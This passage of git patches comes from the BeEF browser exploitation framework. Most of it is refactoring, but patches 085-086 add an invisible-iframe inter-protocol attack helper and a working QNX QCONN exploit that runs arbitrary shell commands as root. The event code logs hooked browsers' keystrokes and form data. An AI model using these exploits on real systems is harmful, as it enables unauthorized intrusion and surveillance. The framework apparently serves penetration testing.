-      { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '172.16.67.135'},
+      { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},
       { 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143'},
       { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
       { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml
index eaf9a25f5..8dd39d022 100644
--- a/modules/exploits/zenoss_add_user_csrf/config.yaml
+++ b/modules/exploits/zenoss_add_user_csrf/config.yaml
@@ -18,8 +18,8 @@ beef:
         zenoss_add_user_csrf:
             enable: true
             category: "Exploits"
-            name: "Zenoss <= 3.2.1 Add User CSRF"
-            description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
+            name: "Zenoss 3.x Add User CSRF"
+            description: "Attempts to add a user to a Zenoss Core 3.x server."
             authors: ["bcoles"]
             target:
                 working: ["ALL"]
diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml
index 923946d5d..0d474f6f0 100644
--- a/modules/exploits/zenoss_daemon_csrf/config.yaml
+++ b/modules/exploits/zenoss_daemon_csrf/config.yaml
@@ -18,8 +18,8 @@ beef:
         zenoss_daemon_csrf:
             enable: true
             category: "Exploits"
-            name: "Zenoss <= 3.2.1 Daemon CSRF"
-            description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server."
+            name: "Zenoss 3.x Daemon CSRF"
+            description: "Attempts to start/stop/restart daemons on a Zenoss Core 3.x server."
             authors: ["bcoles"]
             target:
                 working: ["ALL"]

From deffc8691c8167082775adb3016d617a8cef4611 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Tue, 23 Oct 2012 09:50:01 +1100
Subject: [PATCH 079/397] Fixed event logger: events were not logged for a
 wrong data structure type check.

---
 extensions/events/handler.rb | 51 ++++++++++++++++++------------------
 1 file changed, 25 insertions(+), 26 deletions(-)

diff --git a/extensions/events/handler.rb b/extensions/events/handler.rb
index 0f5d30aa2..0358ea620 100644
--- a/extensions/events/handler.rb
+++ b/extensions/events/handler.rb
@@ -51,36 +51,35 @@ module Events
       events = @data['results']
 
       # push events to logger
-      if (events.kind_of?(Array))
         logger = BeEF::Core::Logger.instance
-        events.each{|e|
-            logger.register('Event', parse(e), zombie.id)
-        }
-      end
-
+        events.each do |key,value|
+            logger.register('Event', parse(value), zombie.id)
+        end
     end
 
     def parse(event)
-        case event['type']
-            when 'click'
-                return event['time'].to_s+'s - [Mouse Click] x: '+event['x'].to_s+' y:'+event['y'].to_s+' > '+event['target'].to_s
-            when 'focus'
-                return event['time'].to_s+'s - [Focus] Browser has regained focus.'
-			when 'copy'
-				return event['time'].to_s+'s - [User Copied Text] "'+event['data'].to_s+'"'
-			when 'cut'
-				return event['time'].to_s+'s - [User Cut Text] "'+event['data'].to_s+'"'
-			when 'paste'
-				return event['time'].to_s+'s - [User Pasted Text] "'+event['data'].to_s+'"'
-            when 'blur'
-                return event['time'].to_s+'s - [Blur] Browser has lost focus.'
-            when 'keys'
-                return event['time'].to_s+'s - [User Typed] "'+event['data'].to_s+'" > '+event['target'].to_s
-			when 'submit'
-				return event['time'].to_s+'s - [Form Submitted] '+event['data'].to_s+' > '+event['target'].to_s
-        end
-        print_debug '[EVENTS] Event handler has received an unknown event'
-        return 'Unknown event'
+      case event['type']
+        when 'click'
+          result = event['time'].to_s+'s - [Mouse Click] x: '+event['x'].to_s+' y:'+event['y'].to_s+' > '+event['target'].to_s
+        when 'focus'
+          result = event['time'].to_s+'s - [Focus] Browser has regained focus.'
+        when 'copy'
+          result = event['time'].to_s+'s - [User Copied Text] "'+event['data'].to_s+'"'
+        when 'cut'
+          result = event['time'].to_s+'s - [User Cut Text] "'+event['data'].to_s+'"'
+        when 'paste'
+          result = event['time'].to_s+'s - [User Pasted Text] "'+event['data'].to_s+'"'
+        when 'blur'
+          result = event['time'].to_s+'s - [Blur] Browser has lost focus.'
+        when 'keys'
+          result = event['time'].to_s+'s - [User Typed] "'+event['data'].to_s+'" > '+event['target'].to_s
+        when 'submit'
+          result = event['time'].to_s+'s - [Form Submitted] '+event['data'].to_s+' > '+event['target'].to_s
+        else
+          print_debug '[EVENTS] Event handler has received an unknown event'
+          result = 'Unknown event'
+      end
+      result
     end
     
   end

From f9b8e0f576ee0b8a7e179af8da05419df8c644fc Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Tue, 23 Oct 2012 10:15:07 +1100
Subject: [PATCH 080/397] Moved admin_ui controllers for extensions in their
 relative extension directory.

---
 extensions/admin_ui/api/handler.rb                  | 13 ++++++++++---
 .../proxy => proxy/controllers}/proxy.rb            |  0
 .../controllers}/requester.rb                       |  0
 .../xssrays => xssrays/controllers}/xssrays.rb      |  0
 4 files changed, 10 insertions(+), 3 deletions(-)
 rename extensions/{admin_ui/controllers/proxy => proxy/controllers}/proxy.rb (100%)
 rename extensions/{admin_ui/controllers/requester => requester/controllers}/requester.rb (100%)
 rename extensions/{admin_ui/controllers/xssrays => xssrays/controllers}/xssrays.rb (100%)

diff --git a/extensions/admin_ui/api/handler.rb b/extensions/admin_ui/api/handler.rb
index 1f7973e73..ddc49d73c 100644
--- a/extensions/admin_ui/api/handler.rb
+++ b/extensions/admin_ui/api/handler.rb
@@ -32,12 +32,19 @@ module API
       # retrieve the configuration class instance
       configuration = BeEF::Core::Configuration.instance
       
-      # registers the http controllers for the AdminUI extensions
-      Dir["#{$root_dir}/extensions/admin_ui/controllers/**/*.rb"].each { |http_module|
+      # registers the http controllers used by BeEF core (authentication, logs, modules and panel)
+      Dir["#{$root_dir}/extensions/admin_ui/controllers/**/*.rb"].each do |http_module|
         require http_module
         mod_name = File.basename http_module, '.rb'
         beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
-      }
+      end
+
+      # registers the http controllers used by BeEF extensions (requester, proxy, xssrays, etc..)
+      Dir["#{$root_dir}/extensions/**/controllers/*.rb"].each do |http_module|
+        require http_module
+        mod_name = File.basename http_module, '.rb'
+        beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
+      end
       
       # mount the folder were we store static files (javascript, css, images) for the admin ui
       media_dir = File.dirname(__FILE__)+'/../media/'
diff --git a/extensions/admin_ui/controllers/proxy/proxy.rb b/extensions/proxy/controllers/proxy.rb
similarity index 100%
rename from extensions/admin_ui/controllers/proxy/proxy.rb
rename to extensions/proxy/controllers/proxy.rb
diff --git a/extensions/admin_ui/controllers/requester/requester.rb b/extensions/requester/controllers/requester.rb
similarity index 100%
rename from extensions/admin_ui/controllers/requester/requester.rb
rename to extensions/requester/controllers/requester.rb
diff --git a/extensions/admin_ui/controllers/xssrays/xssrays.rb b/extensions/xssrays/controllers/xssrays.rb
similarity index 100%
rename from extensions/admin_ui/controllers/xssrays/xssrays.rb
rename to extensions/xssrays/controllers/xssrays.rb

From abd8f538eb5e2ecb2882ecafe425e88543b480e2 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 25 Oct 2012 16:38:29 +1030
Subject: [PATCH 081/397] Remove `demos/html/passwd_manager_theft.html`

Small syntax changes to Event Logger extension `parse()`
---
 .../demos/html/passwd_manager_theft.html      | 27 -------------------
 extensions/events/handler.rb                  | 18 ++++++-------
 2 files changed, 9 insertions(+), 36 deletions(-)
 delete mode 100644 extensions/demos/html/passwd_manager_theft.html

diff --git a/extensions/demos/html/passwd_manager_theft.html b/extensions/demos/html/passwd_manager_theft.html
deleted file mode 100644
index 4a2d70c50..000000000
--- a/extensions/demos/html/passwd_manager_theft.html
+++ /dev/null
@@ -1,27 +0,0 @@
-<html>
-<head>
-	<title>BeEF Password Manager Theft Demo</title>
-</head>
-
-<body>
-	<h2>Password Manager Theft Demo</h2>
-	
-	<p>
-		Instructions:<br>
-		<br>
-		1. Write a fake username and password in the form below<br>
-		2. After having submitted the form, <u>make sure you tell firefox that you want to save</u><br>
-		3. Exploit your hooked browser with the password manager theft command module.
-	</p>
-	
-	<p>
-		<form action="passwd_manager_theft.html" method="POST">
-			Username: <input type="text" name="username"><br><br>
-			Password: <input type="password" name="random"></br>
-			<input type="submit" value="submit">
-		</form>
-	</p>
-	
-</body>
-
-</html>
\ No newline at end of file
diff --git a/extensions/events/handler.rb b/extensions/events/handler.rb
index 0358ea620..a6e83edb5 100644
--- a/extensions/events/handler.rb
+++ b/extensions/events/handler.rb
@@ -60,24 +60,24 @@ module Events
     def parse(event)
       case event['type']
         when 'click'
-          result = event['time'].to_s+'s - [Mouse Click] x: '+event['x'].to_s+' y:'+event['y'].to_s+' > '+event['target'].to_s
+          result = "#{event['time']}s - [Mouse Click] x: #{event['x']} y:#{event['y']} > #{event['target']}"
         when 'focus'
-          result = event['time'].to_s+'s - [Focus] Browser has regained focus.'
+          result = "#{event['time']}s - [Focus] Browser has regained focus."
         when 'copy'
-          result = event['time'].to_s+'s - [User Copied Text] "'+event['data'].to_s+'"'
+          result = "#{event['time']}s - [User Copied Text] \"#{event['data']}\""
         when 'cut'
-          result = event['time'].to_s+'s - [User Cut Text] "'+event['data'].to_s+'"'
+          result = "#{event['time']}s - [User Cut Text] \"#{event['data']}\""
         when 'paste'
-          result = event['time'].to_s+'s - [User Pasted Text] "'+event['data'].to_s+'"'
+          result = "#{event['time']}s - [User Pasted Text] \"#{event['data']}\""
         when 'blur'
-          result = event['time'].to_s+'s - [Blur] Browser has lost focus.'
+          result = "#{event['time']}s - [Blur] Browser has lost focus."
         when 'keys'
-          result = event['time'].to_s+'s - [User Typed] "'+event['data'].to_s+'" > '+event['target'].to_s
+          result = "#{event['time']}s - [User Typed] \"#{event['data']}\" > #{event['target']}"
         when 'submit'
-          result = event['time'].to_s+'s - [Form Submitted] '+event['data'].to_s+' > '+event['target'].to_s
+          result = "#{event['time']}s - [Form Submitted] \"#{event['data']}\" > #{event['target']}"
         else
           print_debug '[EVENTS] Event handler has received an unknown event'
-          result = 'Unknown event'
+          result = "#{event['time']}s - Unknown event"
       end
       result
     end

From 34bae7d51303d48b7bc2f838b3c68342f8823e78 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 26 Oct 2012 16:42:28 +1030
Subject: [PATCH 082/397] Add command module IDs to logs

---
 core/main/handlers/modules/command.rb | 114 +++++++++++---------------
 core/main/models/command.rb           |   4 +-
 2 files changed, 50 insertions(+), 68 deletions(-)

diff --git a/core/main/handlers/modules/command.rb b/core/main/handlers/modules/command.rb
index dc98b1ef8..22771e7b6 100644
--- a/core/main/handlers/modules/command.rb
+++ b/core/main/handlers/modules/command.rb
@@ -13,86 +13,68 @@
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
+
 module BeEF
-  module Core
-    module Handlers
-      module Modules
+module Core
+module Models
 
-        module Command
+  # @note Table stores the commands that have been sent to the Hooked Browsers.
+  class Command
 
-          # Adds the command module instructions to a hooked browser's http response.
-          # @param [Object] command Command object
-          # @param [Object] hooked_browser Hooked Browser object
-          def add_command_instructions(command, hooked_browser)
-            (print_error "hooked_browser is nil"; return) if hooked_browser.nil?
-            (print_error "hooked_browser.session is nil"; return) if hooked_browser.session.nil?
-            (print_error "hooked_browser is nil"; return) if command.nil?
-            (print_error "hooked_browser.command_module_id is nil"; return) if command.command_module_id.nil?
+    include DataMapper::Resource
 
-            config = BeEF::Core::Configuration.instance
-            # @note get the command module
-            command_module = BeEF::Core::Models::CommandModule.first(:id => command.command_module_id)
-            (print_error "command_module is nil"; return) if command_module.nil?
-            (print_error "command_module.path is nil"; return) if command_module.path.nil?
+    storage_names[:default] = 'commands'
 
-            if (command_module.path.match(/^Dynamic/))
-              command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
-            else
-              key = BeEF::Module.get_key_by_database_id(command.command_module_id)
-              command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
-            end
+    property :id, Serial
+    property :data, Text
+    property :creationdate, String, :length => 15, :lazy => false
+    property :label, Text, :lazy => false
+    property :instructions_sent, Boolean, :default => false
 
-            command_module.command_id = command.id
-            command_module.session_id = hooked_browser.session
-            command_module.build_datastore(command.data)
-            command_module.pre_send
+    has n, :results
 
-            build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
+    # Save results and flag that the command has been run on the hooked browser
+    # @param [String] hook_session_id The session_id.
+    # @param [String] command_id The command_id.
+    # @param [String] command_friendly_name The command friendly name.
+    # @param [String] result The result of the command module.
+    def self.save_result(hook_session_id, command_id, command_friendly_name, result)
+      # @note enforcing arguments types
+      command_id = command_id.to_i
 
-            ws = BeEF::Core::Websocket::Websocket.instance
+      # @note argument type checking
+      raise Exception::TypeError, '"hook_session_id" needs to be a string' if not hook_session_id.string?
+      raise Exception::TypeError, '"command_id" needs to be an integer' if not command_id.integer?
+      raise Exception::TypeError, '"command_friendly_name" needs to be a string' if not command_friendly_name.string?
+      raise Exception::TypeError, '"result" needs to be a hash' if not result.hash?
 
-            if config.get("beef.extension.evasion.enable")
-              evasion = BeEF::Extension::Evasion::Evasion.instance
-              @output = evasion.obfuscate(command_module.output)
-            else
-              @output = command_module.output
-            end
+      # @note get the hooked browser structure and id from the database
+      hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => hook_session_id) || nil
+      raise Exception::TypeError, "hooked_browser is nil" if hooked_browser.nil?
+      raise Exception::TypeError, "hooked_browser.id is nil" if hooked_browser.id.nil?
+      hooked_browser_id = hooked_browser.id
+      raise Exception::TypeError, "hooked_browser.ip is nil" if hooked_browser.ip.nil?
+      hooked_browser_ip = hooked_browser.ip
 
-            #todo antisnatchor: remove this gsub crap adding some hook packing.
-            if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
-              #content = command_module.output.gsub('//
-              #//   Copyright 2012 Wade Alcorn wade@bindshell.net
-              #//
-              #//   Licensed under the Apache License, Version 2.0 (the "License");
-              #//   you may not use this file except in compliance with the License.
-              #//   You may obtain a copy of the License at
-              #//
-              #//       http://www.apache.org/licenses/LICENSE-2.0
-              #//
-              #//   Unless required by applicable law or agreed to in writing, software
-              #//   distributed under the License is distributed on an "AS IS" BASIS,
-              #//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-              #//   See the License for the specific language governing permissions and
-              #//   limitations under the License.
-              #//', "")
-              ws.send(@output, hooked_browser.session)
-            else
-              @body << @output + "\n\n"
-            end
-            # @note prints the event to the console
-            if BeEF::Settings.console?
-              name = command_module.friendlyname || kclass
-              print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module '#{name}'"
-            end
+      # @note get the command module data structure from the database
+      command = first(:id => command_id.to_i, :hooked_browser_id => hooked_browser_id) || nil
+      raise Exception::TypeError, "command is nil" if command.nil?
 
-            # @note flag that the command has been sent to the hooked browser
-            command.instructions_sent = true
-            command.save
-          end
+      # @note create the entry for the results 
+      command.results.new(:hooked_browser_id => hooked_browser_id, :data => result.to_json, :date => Time.now.to_i)
+      command.save
 
-        end
+      # @note log that the result was returned
+      BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id)
 
+      # @note prints the event into the console
+      if BeEF::Settings.console?
+        print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']"
       end
     end
+
   end
+
+end
+end
 end
diff --git a/core/main/models/command.rb b/core/main/models/command.rb
index 3ea317ae4..22771e7b6 100644
--- a/core/main/models/command.rb
+++ b/core/main/models/command.rb
@@ -65,11 +65,11 @@ module Models
       command.save
 
       # @note log that the result was returned
-      BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module '#{command_friendly_name}'", hooked_browser_id)
+      BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id)
 
       # @note prints the event into the console
       if BeEF::Settings.console?
-        print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module '#{command_friendly_name}'"
+        print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']"
       end
     end
 

From a3a8bf2f157bd0c7b16889c988b21774e8bd1ae0 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 26 Oct 2012 16:45:00 +1030
Subject: [PATCH 083/397] Add command module IDs to logs

---
 core/main/handlers/modules/command.rb | 114 +++++++++++++++-----------
 1 file changed, 66 insertions(+), 48 deletions(-)

diff --git a/core/main/handlers/modules/command.rb b/core/main/handlers/modules/command.rb
index 22771e7b6..89ae6f14d 100644
--- a/core/main/handlers/modules/command.rb
+++ b/core/main/handlers/modules/command.rb
@@ -13,68 +13,86 @@
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
-
 module BeEF
-module Core
-module Models
+  module Core
+    module Handlers
+      module Modules
 
-  # @note Table stores the commands that have been sent to the Hooked Browsers.
-  class Command
+        module Command
 
-    include DataMapper::Resource
+          # Adds the command module instructions to a hooked browser's http response.
+          # @param [Object] command Command object
+          # @param [Object] hooked_browser Hooked Browser object
+          def add_command_instructions(command, hooked_browser)
+            (print_error "hooked_browser is nil"; return) if hooked_browser.nil?
+            (print_error "hooked_browser.session is nil"; return) if hooked_browser.session.nil?
+            (print_error "hooked_browser is nil"; return) if command.nil?
+            (print_error "hooked_browser.command_module_id is nil"; return) if command.command_module_id.nil?
 
-    storage_names[:default] = 'commands'
+            config = BeEF::Core::Configuration.instance
+            # @note get the command module
+            command_module = BeEF::Core::Models::CommandModule.first(:id => command.command_module_id)
+            (print_error "command_module is nil"; return) if command_module.nil?
+            (print_error "command_module.path is nil"; return) if command_module.path.nil?
 
-    property :id, Serial
-    property :data, Text
-    property :creationdate, String, :length => 15, :lazy => false
-    property :label, Text, :lazy => false
-    property :instructions_sent, Boolean, :default => false
+            if (command_module.path.match(/^Dynamic/))
+              command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
+            else
+              key = BeEF::Module.get_key_by_database_id(command.command_module_id)
+              command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
+            end
 
-    has n, :results
+            command_module.command_id = command.id
+            command_module.session_id = hooked_browser.session
+            command_module.build_datastore(command.data)
+            command_module.pre_send
 
-    # Save results and flag that the command has been run on the hooked browser
-    # @param [String] hook_session_id The session_id.
-    # @param [String] command_id The command_id.
-    # @param [String] command_friendly_name The command friendly name.
-    # @param [String] result The result of the command module.
-    def self.save_result(hook_session_id, command_id, command_friendly_name, result)
-      # @note enforcing arguments types
-      command_id = command_id.to_i
+            build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
 
-      # @note argument type checking
-      raise Exception::TypeError, '"hook_session_id" needs to be a string' if not hook_session_id.string?
-      raise Exception::TypeError, '"command_id" needs to be an integer' if not command_id.integer?
-      raise Exception::TypeError, '"command_friendly_name" needs to be a string' if not command_friendly_name.string?
-      raise Exception::TypeError, '"result" needs to be a hash' if not result.hash?
+            ws = BeEF::Core::Websocket::Websocket.instance
 
-      # @note get the hooked browser structure and id from the database
-      hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => hook_session_id) || nil
-      raise Exception::TypeError, "hooked_browser is nil" if hooked_browser.nil?
-      raise Exception::TypeError, "hooked_browser.id is nil" if hooked_browser.id.nil?
-      hooked_browser_id = hooked_browser.id
-      raise Exception::TypeError, "hooked_browser.ip is nil" if hooked_browser.ip.nil?
-      hooked_browser_ip = hooked_browser.ip
+            if config.get("beef.extension.evasion.enable")
+              evasion = BeEF::Extension::Evasion::Evasion.instance
+              @output = evasion.obfuscate(command_module.output)
+            else
+              @output = command_module.output
+            end
 
-      # @note get the command module data structure from the database
-      command = first(:id => command_id.to_i, :hooked_browser_id => hooked_browser_id) || nil
-      raise Exception::TypeError, "command is nil" if command.nil?
+            #todo antisnatchor: remove this gsub crap adding some hook packing.
+            if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
+              #content = command_module.output.gsub('//
+              #//   Copyright 2012 Wade Alcorn wade@bindshell.net
+              #//
+              #//   Licensed under the Apache License, Version 2.0 (the "License");
+              #//   you may not use this file except in compliance with the License.
+              #//   You may obtain a copy of the License at
+              #//
+              #//       http://www.apache.org/licenses/LICENSE-2.0
+              #//
+              #//   Unless required by applicable law or agreed to in writing, software
+              #//   distributed under the License is distributed on an "AS IS" BASIS,
+              #//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+              #//   See the License for the specific language governing permissions and
+              #//   limitations under the License.
+              #//', "")
+              ws.send(@output, hooked_browser.session)
+            else
+              @body << @output + "\n\n"
+            end
+            # @note prints the event to the console
+            if BeEF::Settings.console?
+              name = command_module.friendlyname || kclass
+              print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module [id:#{command.id}, name:'#{name}']"
+            end
 
-      # @note create the entry for the results 
-      command.results.new(:hooked_browser_id => hooked_browser_id, :data => result.to_json, :date => Time.now.to_i)
-      command.save
+            # @note flag that the command has been sent to the hooked browser
+            command.instructions_sent = true
+            command.save
+          end
 
-      # @note log that the result was returned
-      BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id)
+        end
 
-      # @note prints the event into the console
-      if BeEF::Settings.console?
-        print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']"
       end
     end
-
   end
-
-end
-end
 end

From d7f0a590b75e83561b622236720c4c8ae7130769 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 27 Oct 2012 18:53:04 +1030
Subject: [PATCH 084/397] Fix typo in popup detection

---
 core/main/client/browser/popup.js               | 2 +-
 modules/browser/detect_popup_blocker/command.js | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/core/main/client/browser/popup.js b/core/main/client/browser/popup.js
index bdea5eb35..40780ce7c 100644
--- a/core/main/client/browser/popup.js
+++ b/core/main/client/browser/popup.js
@@ -23,7 +23,7 @@
  */
 beef.browser.popup = {
 	
-		blocker_enbabled: function ()
+		blocker_enabled: function ()
 		{
 			screenParams = beef.browser.getScreenSize();
 			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
diff --git a/modules/browser/detect_popup_blocker/command.js b/modules/browser/detect_popup_blocker/command.js
index 29b785aba..3f634be3d 100644
--- a/modules/browser/detect_popup_blocker/command.js
+++ b/modules/browser/detect_popup_blocker/command.js
@@ -15,6 +15,6 @@
 //
 beef.execute(function() {
 	
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, "popup_blocker_enabled="+beef.browser.popup.blocker_enbabled());
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "popup_blocker_enabled="+beef.browser.popup.blocker_enabled());
 
 });

From 72ac600f9f3cb02f4441090c0b1054b86351bb47 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 27 Oct 2012 18:53:29 +1030
Subject: [PATCH 085/397] Add `createIframeIpecForm` function to client dom
 library

---
 core/main/client/dom.js | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)

diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index 4cb0c2cba..70e6bad85 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -340,6 +340,30 @@ beef.dom = {
         formXsrf.submit();
 
         return iframeXsrf;
+    },
+
+    /**
+     * Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
+     * @params: {String} rhost: remote host ip/domain
+     * @params: {String} rport: remote port
+     * @params: {String} commands: protocol commands to be executed by the remote host:port service
+     */
+    createIframeIpecForm: function(rhost, rport, commands){
+        var iframeIpec = beef.dom.createInvisibleIframe();
+
+        var formIpec = document.createElement('form');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('method',  'POST');
+        formIpec.setAttribute('enctype', 'multipart/form-data');
+
+        input = document.createElement('textarea');
+        input.setAttribute('name', Math.random().toString(36).substring(5));
+        input.value = commands;
+        formIpec.appendChild(input);
+        iframeIpec.contentWindow.document.body.appendChild(formIpec);
+        formIpec.submit();
+
+        return iframeIpec;
     }
 
 };

From 210dc1366a51c4199059e8277995deb1e3d10b7d Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 27 Oct 2012 18:55:33 +1030
Subject: [PATCH 086/397] Add QNX QCONN exploit

---
 .../qnx_qconn_command_execution/command.js    | 52 +++++++++++++++++++
 .../qnx_qconn_command_execution/config.yaml   | 26 ++++++++++
 .../qnx_qconn_command_execution/module.rb     | 32 ++++++++++++
 3 files changed, 110 insertions(+)
 create mode 100644 modules/exploits/qnx_qconn_command_execution/command.js
 create mode 100644 modules/exploits/qnx_qconn_command_execution/config.yaml
 create mode 100644 modules/exploits/qnx_qconn_command_execution/module.rb

diff --git a/modules/exploits/qnx_qconn_command_execution/command.js b/modules/exploits/qnx_qconn_command_execution/command.js
new file mode 100644
index 000000000..0313a3cbf
--- /dev/null
+++ b/modules/exploits/qnx_qconn_command_execution/command.js
@@ -0,0 +1,52 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = '\r\nservice launcher\r\nstart/flags run /bin/sh /bin/sh -c "'+cmd+'"\r\n'
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var qnx_iframe = beef.dom.createIframeIpecForm(rhost, rport, payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(qnx_iframe);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/qnx_qconn_command_execution/config.yaml b/modules/exploits/qnx_qconn_command_execution/config.yaml
new file mode 100644
index 000000000..4d52924e1
--- /dev/null
+++ b/modules/exploits/qnx_qconn_command_execution/config.yaml
@@ -0,0 +1,26 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        qnx_qconn_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "QNX QCONN Command Execution"
+            description: "This module exploits a vulnerability in the qconn component of QNX Neutrino which can be abused to allow unauthenticated users to execute arbitrary commands under the context of the 'root' user.<br/><br/>The results of the commands are not returned to BeEF."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C", "O"]
+                not_working: ["S", "IE"]
diff --git a/modules/exploits/qnx_qconn_command_execution/module.rb b/modules/exploits/qnx_qconn_command_execution/module.rb
new file mode 100644
index 000000000..896787c7a
--- /dev/null
+++ b/modules/exploits/qnx_qconn_command_execution/module.rb
@@ -0,0 +1,32 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Qnx_qconn_command_execution < BeEF::Core::Command
+
+  def self.options
+    return [
